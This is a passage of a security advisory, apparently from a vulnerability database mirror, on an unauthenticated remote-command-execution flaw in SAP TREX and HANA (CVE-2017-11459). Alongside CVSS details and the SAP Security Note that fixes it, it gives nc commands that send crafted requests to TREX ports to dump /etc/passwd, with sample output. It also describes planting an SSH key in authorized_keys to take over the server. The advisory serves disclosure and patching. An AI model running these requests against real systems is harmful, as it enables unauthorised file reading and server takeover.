Lucene search

ERPScanERPSCAN-17-019

HistoryJan 23, 2017 - 12:00 a.m.

SAP TREX RCE

2017-01-2300:00:00

erpscan.io

824

0.01 Low

EPSS

Percentile

83.7%

JSON

Application: SAP TREX **Versions Affected:**SAP TREX 7.10 Vendor URL: SAP **Bugs:**RCE **Reported:**23.01.2017 **Vendor response:**24.01.2017 **Date of Public Advisory:**11.04.2017 **Reference: **SAP Security Note 2419592 Author: Mathieu Geli (ERPScan)

VULNERABILITY INFORMATION

Class: Missing Authentication for Critical Function
Impact: disclose OS files and potentially get RCE on the server (example for Linux)
Remotely Exploitable: yes
Locally Exploitable: no
CVE Name: CVE-2017-11459

CVSS Information

CVSS v3 Base Score: 9.4 / 10
CVSS v3 Base Vector:

AV: Attack Vector (Related exploit range)	Network (N)
AC: Attack Complexity (Required attack complexity)	Low (L)
PR: Privileges Required (Level of privileges needed to exploit)	None (N)
UI: User Interaction (Required user participation)	None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component)	Unchanged (U)
C: Impact to Confidentiality	High (H)
I: Impact to Integrity	High (H)
A: Impact to Availability	Low (L)

Description

Some sensitive operations are available anonymously that can be combined to potentially get remote command execution on the server.

Business risk

A Remote Command Execution vulnerability allows an attacker to inject the code that can be executed by the application. The executed commands will run with the same privileges as the service that executed the command.

VULNERABLE PACKAGES

SAP TREX 7.10.72 (other versions not tested)
SAP HANA SPS12 (1.00.122.01.1470046197I)
SAP HANA 2.0 express edition (2.00.000.00.1479874437I)

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2419592

TECHNICAL DESCRIPTION

An attacker can forge special request to the TREXNet ports 3NN01, 3NN02, 3NN03, 3NN04, 3NN06, 3NN07, 3NN08 to read OS files (command 'fget') or create files (command 'fdir').

If the system is Linux (by default SSH is activated), we can showcase how to get a shell on the server with those two operations by uploading a public key in the service’s file ~/.ssh/authorized_keys and then connect via SSH to the server, taking full control of the TREX daemon.

Proof of Concept

The first attached file "trex_fget_passwd.bin" is a request to dump OS file /etc/passwd on a Unix TREX 7.10 patched server.

You can run the exploit like this:

$ cat trex_fget_passwd.bin | nc <TREXSERVER> 30001

—|—

NB: The port can be any of the TREX ports (from 30001 to 30009).

The response should be the content of the @/etc/passwd@ file like:

at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:Daemon:/sbin:/bin/bash ftp:x:40:49:FTP account:/srv/ftp:/bin/bash games:x:12:100:Games account:/var/games:/bin/bash gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false […]

at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash

bin:x:1:1:bin:/bin:/bin/bash

daemon:x:2:2:Daemon:/sbin:/bin/bash

ftp:x:40:49:FTP account:/srv/ftp:/bin/bash

games:x:12:100:Games account:/var/games:/bin/bash

gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false

[…]

—|—

The second file is for HANA SPS12, dumping @/etc/passwd@

$ cat hanaSPS12_fget_passwd.bin | nc <HANASERVER> 30001

—|—

NB: The port can be any of the TREX ports (from 30001 to 30009)

The response should be the content of the @/etc/passwd@ file looking like: